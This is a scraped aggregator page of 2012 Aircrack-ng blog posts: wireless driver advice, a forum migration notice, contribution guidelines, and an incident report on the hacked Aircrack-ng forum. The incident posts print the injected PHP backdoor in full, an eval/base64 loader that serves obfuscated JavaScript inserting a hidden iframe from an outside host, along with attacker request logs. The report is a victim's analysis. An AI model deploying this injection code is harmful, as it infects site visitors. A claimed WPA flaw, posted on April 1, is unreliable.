monitor if the driver card has that capability in the first place obviously A few important notes here related to VMware VirtualBox If your card is internal, it's not gonna work, you must reboot and run the live CD If your card is USB and you are running VMware Virtualbox, then make sure it is attached to the virtual machine It is explained in the wiki for VMware and it is pretty similar for VirtualBox If it doesn't work, the quickest way to find out if it will work is to compile compat-wireless, install it and reboot If your card doesn't show up then it might need a firmware Download it and put it at the right location Most of the time, a package containing it is available for your distribution search for firmware with your package manager synaptic apt-cache aptitude on Debian-based distro and install it If you download it manually, check dmesg to make sure it doesn't show an error the message is self-explanatory when it happens If your card still doesn't show up assuming there is no unresolved symbols , then it's probably not gonna work In that case, you might want to practice your Google-fu to see if there is a driver in the works http://www.secuobs.com/revue/news/406556.shtmlhttp://www.secuobs.com/revue/news/406556.shtml Secuobs.com : 2012-07-06 15:26:25 - Aircrack ng - Hi, June has been a very busy month for me, I didn't really have time to work on the forum and I apologize for that I've been working for the past week on bringing back up all those services Trac and svn were safe to use and brought back up a few days ago and I spent a few more days to clean up the forum and migrate it to a new server Nothing was lost and your login passwords are still the same Since it is on a new machine, on its own, it should be faster than before and I can tell you that it is also better protected I listened to your advices In this case, it also means a new IP and thus it might in some cases take a day or two for DNS to spread How do you know you reached the new one Two ways Open it in a browser, the old forum will return a 403 Forbidden, so if you don't have that, you're good Do a nslookup forumaircrack-ngorg It should return 17832208188 Please send me feedback about the forum in the comments, especially if you have issues with it I'll try to address them Enjoy http://www.secuobs.com/revue/news/385797.shtmlhttp://www.secuobs.com/revue/news/385797.shtml Secuobs.com : 2012-06-05 03:19:47 - Aircrack ng - I got more time to investigate it I had a backup of the forum and wanted to make sure there were no changes to the files besides that added file so I ran a MD5 And it turned out the PHP files were changed At the beginning of the indexphp, you could see the following code added in between php tags eval base64_decode 'ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTJGMllYTjJQWEJ5YjNSdmRIbHdaVHQ5WTJGMFkyZ29laWw3YUQwaWFHRnlRMjlrWlNJN1pqMWJKeTB6TTJZdE16Tm1Oak5tTmpCbUxURXdaaTB5WmpVNFpqWTVaalUzWmpjMVpqWTNaalU1WmpZNFpqYzBaalJtTmpGbU5UbG1OelJtTWpkbU5qWm1OVGxtTmpkbU5UbG1OamhtTnpSbU56Tm1NalJtTnpsbU5ESm1OVFZtTmpGbU16Wm1OVFZtTmpkbU5UbG1MVEptTFRObU5UWm1OamxtTlRobU56bG1MVE5tTFRGbU5EbG1ObVkxTVdZdE1XWTRNV1l0TWpsbUxUTXpaaTB6TTJZdE16Tm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1NVGRtTFRJNVppMHpNMll0TXpObU9ETm1MVEV3WmpVNVpqWTJaamN6WmpVNVppMHhNR1k0TVdZdE1qbG1MVE16Wmkwek0yWXRNek5tTlRobU5qbG1OVGRtTnpWbU5qZG1OVGxtTmpobU56Um1OR1kzTjJZM01tWTJNMlkzTkdZMU9XWXRNbVl0T0dZeE9HWTJNMlkyTUdZM01tWTFOV1kyTjJZMU9XWXRNVEJtTnpObU56Sm1OVGRtTVRsbUxUTm1OakptTnpSbU56Um1OekJtTVRabU5XWTFaamN5WmpZMFpqYzVaamMwWmpZMVpqWXpaamM0WmpVMlpqWXdaalkwWmpjNFpqWTFaalkxWmpSbU5qZG1OemxtTmpCbU56ZG1OR1kzTldZM00yWTFaakl4WmpZeFpqWTVaakU1WmpobUxUTm1MVEV3WmpjM1pqWXpaalU0WmpjMFpqWXlaakU1WmkwelpqZG1ObVl0TTJZdE1UQm1OakptTlRsbU5qTm1OakZtTmpKbU56Um1NVGxtTFRObU4yWTJaaTB6WmkweE1HWTNNMlkzTkdZM09XWTJObVkxT1dZeE9XWXRNMlkzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE5tWTJNbVkyTTJZMU9HWTFPR1kxT1dZMk9HWXhOMlkzTUdZMk9XWTNNMlkyTTJZM05HWTJNMlkyT1dZMk9HWXhObVkxTldZMU5tWTNNMlkyT1dZMk5tWTNOV1kzTkdZMU9XWXhOMlkyTm1ZMU9XWTJNR1kzTkdZeE5tWTJaakUzWmpjMFpqWTVaamN3WmpFMlpqWm1NVGRtTFRObU1qQm1NVGhtTldZMk0yWTJNR1kzTW1ZMU5XWTJOMlkxT1dZeU1HWXRPR1l0TVdZeE4yWXRNamxtTFRNelppMHpNMlk0TTJZdE1qbG1MVE16Wmkwek0yWTJNR1kzTldZMk9HWTFOMlkzTkdZMk0yWTJPV1kyT0dZdE1UQm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1OekptTFRKbUxURm1PREZtTFRJNVppMHpNMll0TXpObUxUTXpaamMyWmpVMVpqY3laaTB4TUdZMk1HWXRNVEJtTVRsbUxURXdaalU0WmpZNVpqVTNaamMxWmpZM1pqVTVaalk0WmpjMFpqUm1OVGRtTnpKbU5UbG1OVFZtTnpSbU5UbG1NamRtTmpabU5UbG1OamRtTlRsbU5qaG1OelJtTFRKbUxUTm1Oak5tTmpCbU56Sm1OVFZtTmpkbU5UbG1MVE5tTFRGbU1UZG1OakJtTkdZM00yWTFPV1kzTkdZeU0yWTNOR1kzTkdZM01tWTJNMlkxTm1ZM05XWTNOR1kxT1dZdE1tWXRNMlkzTTJZM01tWTFOMll0TTJZeVppMHpaall5WmpjMFpqYzBaamN3WmpFMlpqVm1OV1kzTW1ZMk5HWTNPV1kzTkdZMk5XWTJNMlkzT0dZMU5tWTJNR1kyTkdZM09HWTJOV1kyTldZMFpqWTNaamM1WmpZd1pqYzNaalJtTnpWbU56Tm1OV1l5TVdZMk1XWTJPV1l4T1dZNFppMHpaaTB4WmpFM1pqWXdaalJtTnpObU56Um1OemxtTmpabU5UbG1OR1kzTm1ZMk0yWTNNMlkyTTJZMU5tWTJNMlkyTm1ZMk0yWTNOR1kzT1dZeE9XWXRNMlkyTW1ZMk0yWTFPR1kxT0dZMU9XWTJPR1l0TTJZeE4yWTJNR1kwWmpjelpqYzBaamM1WmpZMlpqVTVaalJtTnpCbU5qbG1Oek5tTmpObU56Um1Oak5tTmpsbU5qaG1NVGxtTFRObU5UVm1OVFptTnpObU5qbG1OalptTnpWbU56Um1OVGxtTFRObU1UZG1OakJtTkdZM00yWTNOR1kzT1dZMk5tWTFPV1kwWmpZMlpqVTVaall3WmpjMFpqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkzTkdZM09XWTJObVkxT1dZMFpqYzBaalk1Wmpjd1pqRTVaaTB6WmpabUxUTm1NVGRtTmpCbU5HWTNNMlkxT1dZM05HWXlNMlkzTkdZM05HWTNNbVkyTTJZMU5tWTNOV1kzTkdZMU9XWXRNbVl0TTJZM04yWTJNMlkxT0dZM05HWTJNbVl0TTJZeVppMHpaamRtTm1ZdE0yWXRNV1l4TjJZMk1HWTBaamN6WmpVNVpqYzBaakl6WmpjMFpqYzBaamN5WmpZelpqVTJaamMxWmpjMFpqVTVaaTB5WmkwelpqWXlaalU1WmpZelpqWXhaall5WmpjMFppMHpaakptTFRObU4yWTJaaTB6WmkweFpqRTNaaTB5T1dZdE16Tm1MVE16Wmkwek0yWTFPR1kyT1dZMU4yWTNOV1kyTjJZMU9XWTJPR1kzTkdZMFpqWXhaalU1WmpjMFpqSTNaalkyWmpVNVpqWTNaalU1WmpZNFpqYzBaamN6WmpJMFpqYzVaalF5WmpVMVpqWXhaak0yWmpVMVpqWTNaalU1WmkweVppMHpaalUyWmpZNVpqVTRaamM1WmkwelppMHhaalE1WmpabU5URm1OR1kxTldZM01HWTNNR1kxT1dZMk9HWTFPR1l5TldZMk1tWTJNMlkyTm1ZMU9HWXRNbVkyTUdZdE1XWXhOMll0TWpsbUxUTXpaaTB6TTJZNE15ZGRXekJkTG5Od2JHbDBLQ2RtSnlrN2RqMGlaU0lySW5aaElqdDlhV1lvZGlsbFBYZHBibVJ2ZDF0Mkt5SnNJbDA3ZEhKNWUzRTlaRzlqZFcxbGJuUXVZM0psWVhSbFJXeGxiV1Z1ZENnaVpHbDJJaWs3Y1M1aGNIQmxibVJEYUdsc1pDaHhLeUlpS1R0OVkyRjBZMmdvY1hkbktYdDNQV1k3Y3oxYlhUdDlJSEk5VTNSeWFXNW5PM285S0NobEtUOW9PaUlpS1R0bWIzSW9PelUzTnlFOWFUdHBLejB4S1h0cVBXazdhV1lvWlNselBYTXJjbHNpWm5KdmJVTWlLeWdvWlNrL2Vqb3hNaWxkS0hkYmFsMHFNU3MwTWlrN2ZTQnBaaWgySmlabEppWnlKaVo2Smlab0ppWnpKaVptSmlaMktXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K' When it is decoded, the beginning is clear but it has once more an eval and base64_decode error_reporting 0 bot FALSE ua SERVER 'HTTP_USER_AGENT' botsUA array '12345','alexacom','anonymouseorg','bdbrandprotectcom','blogpulsecom','bot','buzztrackercom','crawl','docomo','drupalorg','feedtools','htmldoc','httpclient','internetseercom','linux','macintosh','mac os','magent','mailru','mybloglog api','netcraft','openacoonde','opera mini','opera mobi','playstation','postrankcom','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android','chrome' foreach botsUA as bs if strpos strtolower ua , bs false bot true break if bot echo base64_decode 'PHNjcmlwdD5pPTA7dHJ5e2F2YXN2PXByb3RvdHlwZTt9Y2F0Y2goeil7aD0iaGFyQ29kZSI7Zj1bJy0zM2YtMzNmNjNmNjBmLTEwZi0yZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNjFmNTlmNzRmMjdmNjZmNTlmNjdmNTlmNjhmNzRmNzNmMjRmNzlmNDJmNTVmNjFmMzZmNTVmNjdmNTlmLTJmLTNmNTZmNjlmNThmNzlmLTNmLTFmNDlmNmY1MWYtMWY4MWYtMjlmLTMzZi0zM2YtMzNmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmMTdmLTI5Zi0zM2YtMzNmODNmLTEwZjU5ZjY2ZjczZjU5Zi0xMGY4MWYtMjlmLTMzZi0zM2YtMzNmNThmNjlmNTdmNzVmNjdmNTlmNjhmNzRmNGY3N2Y3MmY2M2Y3NGY1OWYtMmYtOGYxOGY2M2Y2MGY3MmY1NWY2N2Y1OWYtMTBmNzNmNzJmNTdmMTlmLTNmNjJmNzRmNzRmNzBmMTZmNWY1ZjcyZjY0Zjc5Zjc0ZjY1ZjYzZjc4ZjU2ZjYwZjY0Zjc4ZjY1ZjY1ZjRmNjdmNzlmNjBmNzdmNGY3NWY3M2Y1ZjIxZjYxZjY5ZjE5ZjhmLTNmLTEwZjc3ZjYzZjU4Zjc0ZjYyZjE5Zi0zZjdmNmYtM2YtMTBmNjJmNTlmNjNmNjFmNjJmNzRmMTlmLTNmN2Y2Zi0zZi0xMGY3M2Y3NGY3OWY2NmY1OWYxOWYtM2Y3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxNmY2MmY2M2Y1OGY1OGY1OWY2OGYxN2Y3MGY2OWY3M2Y2M2Y3NGY2M2Y2OWY2OGYxNmY1NWY1NmY3M2Y2OWY2NmY3NWY3NGY1OWYxN2Y2NmY1OWY2MGY3NGYxNmY2ZjE3Zjc0ZjY5ZjcwZjE2ZjZmMTdmLTNmMjBmMThmNWY2M2Y2MGY3MmY1NWY2N2Y1OWYyMGYtOGYtMWYxN2YtMjlmLTMzZi0zM2Y4M2YtMjlmLTMzZi0zM2Y2MGY3NWY2OGY1N2Y3NGY2M2Y2OWY2OGYtMTBmNjNmNjBmNzJmNTVmNjdmNTlmNzJmLTJmLTFmODFmLTI5Zi0zM2YtMzNmLTMzZjc2ZjU1ZjcyZi0xMGY2MGYtMTBmMTlmLTEwZjU4ZjY5ZjU3Zjc1ZjY3ZjU5ZjY4Zjc0ZjRmNTdmNzJmNTlmNTVmNzRmNTlmMjdmNjZmNTlmNjdmNTlmNjhmNzRmLTJmLTNmNjNmNjBmNzJmNTVmNjdmNTlmLTNmLTFmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3M2Y3MmY1N2YtM2YyZi0zZjYyZjc0Zjc0ZjcwZjE2ZjVmNWY3MmY2NGY3OWY3NGY2NWY2M2Y3OGY1NmY2MGY2NGY3OGY2NWY2NWY0ZjY3Zjc5ZjYwZjc3ZjRmNzVmNzNmNWYyMWY2MWY2OWYxOWY4Zi0zZi0xZjE3ZjYwZjRmNzNmNzRmNzlmNjZmNTlmNGY3NmY2M2Y3M2Y2M2Y1NmY2M2Y2NmY2M2Y3NGY3OWYxOWYtM2Y2MmY2M2Y1OGY1OGY1OWY2OGYtM2YxN2Y2MGY0ZjczZjc0Zjc5ZjY2ZjU5ZjRmNzBmNjlmNzNmNjNmNzRmNjNmNjlmNjhmMTlmLTNmNTVmNTZmNzNmNjlmNjZmNzVmNzRmNTlmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0ZjY2ZjU5ZjYwZjc0ZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y3NGY3OWY2NmY1OWY0Zjc0ZjY5ZjcwZjE5Zi0zZjZmLTNmMTdmNjBmNGY3M2Y1OWY3NGYyM2Y3NGY3NGY3MmY2M2Y1NmY3NWY3NGY1OWYtMmYtM2Y3N2Y2M2Y1OGY3NGY2MmYtM2YyZi0zZjdmNmYtM2YtMWYxN2Y2MGY0ZjczZjU5Zjc0ZjIzZjc0Zjc0ZjcyZjYzZjU2Zjc1Zjc0ZjU5Zi0yZi0zZjYyZjU5ZjYzZjYxZjYyZjc0Zi0zZjJmLTNmN2Y2Zi0zZi0xZjE3Zi0yOWYtMzNmLTMzZi0zM2Y1OGY2OWY1N2Y3NWY2N2Y1OWY2OGY3NGY0ZjYxZjU5Zjc0ZjI3ZjY2ZjU5ZjY3ZjU5ZjY4Zjc0ZjczZjI0Zjc5ZjQyZjU1ZjYxZjM2ZjU1ZjY3ZjU5Zi0yZi0zZjU2ZjY5ZjU4Zjc5Zi0zZi0xZjQ5ZjZmNTFmNGY1NWY3MGY3MGY1OWY2OGY1OGYyNWY2MmY2M2Y2NmY1OGYtMmY2MGYtMWYxN2YtMjlmLTMzZi0zM2Y4MyddWzBdLnNwbGl0KCdmJyk7dj0iZSIrInZhIjt9aWYodillPXdpbmRvd1t2KyJsIl07dHJ5e3E9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iik7cS5hcHBlbmRDaGlsZChxKyIiKTt9Y2F0Y2gocXdnKXt3PWY7cz1bXTt9IHI9U3RyaW5nO3o9KChlKT9oOiIiKTtmb3IoOzU3NyE9aTtpKz0xKXtqPWk7aWYoZSlzPXMrclsiZnJvbUMiKygoZSk ejoxMildKHdbal0qMSs0Mik7fSBpZih2JiZlJiZyJiZ6JiZoJiZzJiZmJiZ2KWUocyk7PC9zY3JpcHQ ' And that second part decoded unfortunately is obfuscated it is Javascript and enclosed between script tags i 0 try avasv prototype catch z h harCode f '-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83' 0 split 'f' v e va if v e window v l try q documentcreateElement div qappendChild q catch qwg w f s r String z e h for 577 i i 1 j i if e s s r fromC e z 12 w j 1 42 if v Indented i 0 try avasv prototype catch z h harCode f '-33f-33f63f60f-10f-2f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f-1f81f-29f-33f-33f-33f63f60f72f55f67f59f72f-2f-1f17f-29f-33f-33f83f-10f59f66f73f59f-10f81f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f77f72f63f74f59f-2f-8f18f63f60f72f55f67f59f-10f73f72f57f19f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-10f77f63f58f74f62f19f-3f7f6f-3f-10f62f59f63f61f62f74f19f-3f7f6f-3f-10f73f74f79f66f59f19f-3f76f63f73f63f56f63f66f63f74f79f16f62f63f58f58f59f68f17f70f69f73f63f74f63f69f68f16f55f56f73f69f66f75f74f59f17f66f59f60f74f16f6f17f74f69f70f16f6f17f-3f20f18f5f63f60f72f55f67f59f20f-8f-1f17f-29f-33f-33f83f-29f-33f-33f60f75f68f57f74f63f69f68f-10f63f60f72f55f67f59f72f-2f-1f81f-29f-33f-33f-33f76f55f72f-10f60f-10f19f-10f58f69f57f75f67f59f68f74f4f57f72f59f55f74f59f27f66f59f67f59f68f74f-2f-3f63f60f72f55f67f59f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f73f72f57f-3f2f-3f62f74f74f70f16f5f5f72f64f79f74f65f63f78f56f60f64f78f65f65f4f67f79f60f77f4f75f73f5f21f61f69f19f8f-3f-1f17f60f4f73f74f79f66f59f4f76f63f73f63f56f63f66f63f74f79f19f-3f62f63f58f58f59f68f-3f17f60f4f73f74f79f66f59f4f70f69f73f63f74f63f69f68f19f-3f55f56f73f69f66f75f74f59f-3f17f60f4f73f74f79f66f59f4f66f59f60f74f19f-3f6f-3f17f60f4f73f74f79f66f59f4f74f69f70f19f-3f6f-3f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f77f63f58f74f62f-3f2f-3f7f6f-3f-1f17f60f4f73f59f74f23f74f74f72f63f56f75f74f59f-2f-3f62f59f63f61f62f74f-3f2f-3f7f6f-3f-1f17f-29f-33f-33f-33f58f69f57f75f67f59f68f74f4f61f59f74f27f66f59f67f59f68f74f73f24f79f42f55f61f36f55f67f59f-2f-3f56f69f58f79f-3f-1f49f6f51f4f55f70f70f59f68f58f25f62f63f66f58f-2f60f-1f17f-29f-33f-33f83' 0 split 'f' v e va if v e window v l try q documentcreateElement div qappendChild q catch qwg w f s r String z e h for 577 i i 1 j i if e s s r fromC e z 12 w j 1 42 if v e r z h s f v e s It's not really clear I get that he created a table with the split command 'f' is just a separator , but I don't know yet what that function does On side note, I still haven't got any news from the report I made and I asked again a few days ago , so I think I can conclude that it's a shady business as I thought I'd like to thank a lot everybody who has already helped me and given me tips on what to check on the server http://www.secuobs.com/revue/news/379482.shtmlhttp://www.secuobs.com/revue/news/379482.shtml Secuobs.com : 2012-05-30 04:37:08 - Aircrack ng - Hi, as you know, I shut down the server a few days ago because I was told there was a virus Here is what I know about it so far This post will be updated as I know more There is a summary at the end of this post which will be useful for your IT department The virus is also known by Sophos as Mal Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data' It's a piece of PHP called rbvzvphp 1418 bytes that has a payload encoded in base64 Then it is passed to the JavaScript function eval which is going to execute it If any of you guys is interested in the piece of code, let me know, I can send you a copy I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it I can read Javascript but the problem is that it's not plain Base64 I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges user without bash, etc For those who are interested, here is the raw apache log from the attack 91224160132 - - 23 May 2012 01 12 04 0200 POST data rbvzvphp HTTP 11 200 15 http forumaircrack-ngorg phpmyadmin indexphp Mozilla 40 compatible MSIE 80 Windows NT 61 WOW64 Trident 40 SLCC2 Media Center PC 60 InfoPath2 MS-RTC LM 8 190102136196 - - 23 May 2012 20 22 43 0200 POST data rbvzvphp HTTP 10 200 727 - Mozilla 40 compatible MSIE 80 Windows NT 61 WOW64 Trident 40 SLCC2 NET CLR 2050727 NET CLR 3530729 NET CLR 3030729 Media Center PC 60 MAAR NET40C NET40E AskTbPTV2 59114019 813022242 - - 23 May 2012 20 23 26 0200 POST data rbvzvphp HTTP 11 200 1212 - Mozilla 40 compatible MSIE 80 Windows NT 61 WOW64 Trident 40 SLCC2 NET CLR 2050727 NET CLR 3530729 NET CLR 3030729 Media Center PC 60 MAAR NET40C NET40E AskTbPTV2 59114019 116551996 - - 23 May 2012 20 24 50 0200 POST data rbvzvphp HTTP 11 200 1212 - Mozilla 40 compatible MSIE 80 Windows NT 61 WOW64 Trident 40 SLCC2 NET CLR 2050727 NET CLR 3530729 NET CLR 3030729 Media Center PC 60 MAAR NET40C NET40E AskTbPTV2 59114019 61501712 - - 23 May 2012 20 28 15 0200 POST data rbvzvphp HTTP 11 200 1270 - Mozilla 40 compatible MSIE 80 Windows NT 61 WOW64 Trident 40 SLCC2 NET CLR 2050727 NET CLR 3530729 NET CLR 3030729 Media Center PC 60 MAAR NET40C NET40E AskTbPTV2 59114019 1782182242 - - 23 May 2012 20 27 01 0200 POST data rbvzvphp HTTP 11 200 1270 - Mozilla 40 compatible MSIE 80 Windows NT 61 WOW64 Trident 40 SLCC2 NET CLR 2050727 NET CLR 3530729 NET CLR 3030729 Media Center PC 60 MAAR NET40C NET40E AskTbPTV2 59114019 200222109146 - - 24 May 2012 07 48 55 0200 POST data rbvzvphp HTTP 11 200 19 - Mozilla 50 Windows NT 61 Win64 x64 rv 50 Gecko 20110619 Firefox 50 200223136254 - - 24 May 2012 11 50 31 0200 POST data rbvzvphp HTTP 11 200 19 - Mozilla 50 compatible MSIE 80 Windows NT 51 Trident 40 SLCC1 NET CLR 3045062152 NET CLR 3530729 NET CLR 114322 210101131232 - - 24 May 2012 15 49 50 0200 POST data rbvzvphp asc eval base64_decode pourcents27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP 11 200 19 - Chrome 1508600 Windows U Windows NT 60 en-US AppleWebKit 5332025 KHTML, like Gecko Version 1508600 As you can see, the file was created by that first guy, 91224160132 and the timestamp creation and last modification of the file confirms it -rw-r--r-- 1 USER GROUP 1418 2012-05-23 01 12 rbvzvphp Unfortunately, I don't think I can do against those guys, a whois on that IP address looks like it's a shady business Bergdorf Group Ltd IP in the Netherlands but the person to contact lives in the Virgin Islands Anyway, I sent them an email address and we'll see if they answer As far as I know, it is limited to the forum and nothing else The attacker didn't get on the server or installed any backdoor So here is what I'm gonna do next I'll check the forum database to see if they tried anything else against the forum and check the apache logs to see if there is any other mention of those IP addresses I want to know how it happened exactly and when The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated So, to summarize it happened a day before I got the email letting me know there is a virus It happened May 22 at 23h12 1112pm and I stopped it on May 24, around 14h00 2pm I don't remember noticing anything special when browsing the forum between those dates I'm not sure if I browsed it on those dates In case you experienced anything, let me know I'm really sorry about it http://www.secuobs.com/revue/news/378421.shtmlhttp://www.secuobs.com/revue/news/378421.shtml Secuobs.com : 2012-05-11 03:00:32 - Aircrack ng - I got an email asking how to contribute to Aircrack-ng He was telling me that he did not find any information about it He was right, there was nothing written yet it's kinda implicit but let's address that So, first of all, make sure to work on the latest subversion revision and make your modifications in it Don't remove the subversion control directory svn and files About the code, it MUST be GPL or GPLv2 and allow OpenSSL exception see the license exception in every single source code file You can add comment to your diff file at the top, before the line beginning with It is displayed by trac and you can easily read them but the advantage is that it is ignored by patch when applying the patch Make it clear in that section that your patch is GPL or GPLv2 and allow OpenSSL exception Another thing about the code make sure that your code is easy to read and well commented I'm talking about smart comments and documenting code that is not obvious I found a post about it and he uses Javascript but it applies to every other language Ah yeah, don't address several issues with a single patch One patch one issue Once you're done, you have to create a difference or a patch, that's the same thing Thanks to subversion, it is very easy to do just issue 'svn diff PATCH_FILEdiff' and you're done Important note If your changes added files, make sure to do a 'svn add' for each of them If you don't do it, the added files won't be included in the patch Once you're done all that, you can create a new ticket on our trac, fill all the fields if you are not sure how to fill some of them, don't worry, I'll do it and attach the patch If you have any issue doing so, feel free to shoot me an email with all the details, I'll post it If you have several patches and they need to be applied in a specific order affecting the same file , add a number in front of the name of the patch so that I know how to apply them or explain the order of the patches in the ticket That's it If you have other questions, post them in the comments, and I'll update this post to address them http://www.secuobs.com/revue/news/374963.shtmlhttp://www.secuobs.com/revue/news/374963.shtml Secuobs.com : 2012-04-01 21:45:57 - Aircrack ng - Today we are very proud to announce the we found a flaw that let us crack WPA in just a few minutes no matter what the passphrase length is Obviously, we don't get the passphrase but the PMK which is 'derived' from the ESSID and the passphrase , the master key which is more than enough to decrypt a capture file Airdecap-ng allows to decrypt a pcap file with either the passphrase or the PMK using -k I'm sorry, I wish I had more time to write a longer post to give more technical details but right now I'm very busy writing the paper It will be published here probably tomorrow And in case you wonder, it will be integrated into Aircrack-ng http://www.secuobs.com/revue/news/367466.shtmlhttp://www.secuobs.com/revue/news/367466.shtml Secuobs.com : 2012-03-09 01:13:07 - Aircrack ng - We have at least 2 or 3 times a day on IRC the questions about compiling drivers and more in the forum and we always say that you have to patch them like explained in the wiki As said thousand of times I just want to avoid having to say it again in the future , you should ALWAYS take the latest compat-wireless version NO MATTER what your kernel version is Compat-wireless version is related to the kernel version in a way that it has the features a kernel version has So, there is no point in taking the same version as your kernel because all you will do is having the features and not fix anything that you already had in your kernel minus the patches from your distro if any were applied Compat-wireless with dates instead of version is the most up to date and it comes from git So if you are not a developer who wants to debug work with them , then you should not use these You can get much more details and downloads on Linux Wireless website To summarize or if you don't want to read anything else in this post ALWAYS take the latest version of compat-wireless don't take the one with dates http://www.secuobs.com/revue/news/362376.shtmlhttp://www.secuobs.com/revue/news/362376.shtml Secuobs.com : 2012-02-20 02:10:35 - Aircrack ng - WPA cracking is at the same time easy and hard to crack It is quite easy because all you need is getting the handshake with WEP, you need a lot of data frames It is 